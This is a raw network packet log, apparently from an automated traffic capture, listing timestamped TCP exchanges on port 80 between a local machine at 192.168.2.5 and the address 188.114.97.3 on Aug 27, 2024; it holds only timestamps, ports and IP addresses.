                              Aug 27, 2024 09:48:53.676960945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.676976919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677004099 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677007914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677031040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677047014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677050114 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677062988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677093029 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677215099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677254915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677269936 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677269936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677308083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677347898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677405119 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677427053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677444935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677448034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677458048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677481890 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677499056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677514076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677537918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677580118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677594900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677609921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677620888 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677648067 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677741051 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677756071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677772045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677787066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677803040 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677818060 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677819014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677845001 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677911997 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.677978039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.677994013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678009033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678024054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678040028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678045988 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678061962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678066969 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678102970 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678119898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678258896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678272963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678287029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678298950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678307056 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678314924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678324938 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678330898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678345919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678361893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678406000 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678435087 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678476095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678491116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678507090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678519964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678523064 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678543091 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678636074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678651094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678666115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678673029 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678680897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678704023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678770065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678786039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678802013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678816080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678858995 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678865910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678879023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678915977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678930998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.678937912 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.678966999 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.679059982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679076910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679092884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679107904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679116011 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.679132938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679141045 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.679200888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679234028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.679318905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679333925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679347992 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679363966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679373026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.679379940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679394007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679409027 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679424047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679442883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.679476976 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.679538965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679553032 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679569006 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679589987 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679598093 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.679605007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679615974 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.679620028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679636955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679649115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679704905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.679846048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679860115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679874897 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679891109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679903030 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.679912090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.679929972 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.680006027 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.680012941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680028915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680047035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680068016 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680071115 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.680083990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680102110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680109024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.680144072 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.680155993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680171013 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680186033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680211067 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.680252075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680267096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680280924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680294991 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.680298090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680314064 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680321932 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.680330038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680352926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.680355072 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.680387020 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.704988003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.705040932 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.705055952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.705127954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.705132008 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.705143929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.705174923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.705197096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.705213070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.705271959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.765096903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765109062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765125036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765141964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765152931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765165091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765178919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765265942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765276909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765289068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765299082 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765304089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765398979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.765455008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765458107 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.765465975 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765475035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765503883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.765523911 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765539885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765551090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765571117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.765608072 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.765675068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765685081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765693903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765703917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765716076 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765733004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.765765905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.765809059 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765820026 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765856028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.765925884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765935898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765947104 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765964985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.765985012 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.765986919 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.765995979 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766004086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766058922 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.766146898 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766156912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766165972 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766175985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766189098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766199112 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766206026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.766208887 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766283989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766298056 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.766319990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766328096 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.766351938 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.766364098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766376019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766385078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766405106 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.766560078 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766571045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766580105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766590118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766601086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766617060 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766645908 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.766709089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766724110 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.766725063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766736031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766746998 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766751051 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.766786098 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.766933918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766948938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766958952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766967058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766978025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.766990900 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767000914 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767011881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767036915 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767072916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767117977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767163992 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767232895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767241001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767251015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767261982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767272949 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767280102 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767282963 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767293930 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767301083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767321110 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767373085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767417908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767419100 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767503023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767513990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767524958 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767534971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767541885 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767559052 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767628908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767640114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767647982 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767679930 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767700911 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767749071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767760038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767769098 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767793894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767880917 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767891884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767900944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767913103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.767919064 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.767951012 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768008947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768018961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768028975 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768038988 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768058062 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768071890 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768213034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768224001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768234968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768244028 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768249989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768277884 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768311977 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768322945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768332005 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768342018 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768356085 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768369913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768475056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768491030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768501043 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768511057 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768522024 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768531084 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768532038 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768558025 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768624067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768665075 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768699884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768711090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768719912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768729925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768739939 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768743992 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768769979 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.768922091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768930912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768940926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768951893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768964052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768973112 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.768987894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.769054890 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.793561935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.793605089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.793616056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.793684959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.793710947 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.793737888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.793749094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.793757915 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.793767929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.793777943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.793843985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.793864965 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.853455067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853477001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853492022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853522062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853554964 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.853609085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853622913 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853626966 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.853635073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853642941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853681087 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.853859901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853888035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853897095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853976965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853987932 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:53.853987932 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:53.853997946 CEST8061383188.114.97.3192.168.2.5
